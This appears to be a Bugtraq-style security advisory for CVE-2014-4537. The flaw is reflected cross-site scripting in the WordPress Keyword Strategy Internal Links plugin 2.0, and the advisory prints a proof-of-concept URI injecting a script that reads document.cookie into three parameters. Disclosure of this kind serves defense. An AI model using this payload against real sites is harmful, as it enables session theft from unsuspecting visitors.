WordPress Keyword Strategy Internal Links Plugin Multiple Cross Site Scripting Vulnerabilities

Bugtraq ID:	69542
Class:	Input Validation Error
CVE:	CVE-2014-4537
Remote:	Yes
Local:	No
Published:	May 28 2014 12:00AM
Updated:	May 28 2014 12:00AM
Credit:	Prajal Kulkarni
Vulnerable:	Keyword Strategy Internal Links Project Keyword Strategy Internal Links 2.0 - ~-~-~Wordpress
Not Vulnerable:

WordPress Keyword Strategy Internal Links Plugin Multiple Cross Site Scripting Vulnerabilities

To exploit these issues an attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URI is available:

http://www.example.com/wordpress/wp-content/wp-plugs/keyword-strategy-internal-links/inpage.tpl.php?sort=sort%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&search=search%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&dir=dir%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

WordPress Keyword Strategy Internal Links Plugin Multiple Cross Site Scripting Vulnerabilities

Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].

WordPress Keyword Strategy Internal Links Plugin Multiple Cross Site Scripting Vulnerabilities

References:

• WordPress HomePage (WordPress)
  
• wp-plugin : keyword-strategy-internal-links �?? A3-Cross-Site Scripting (XSS) (CodeVigilant)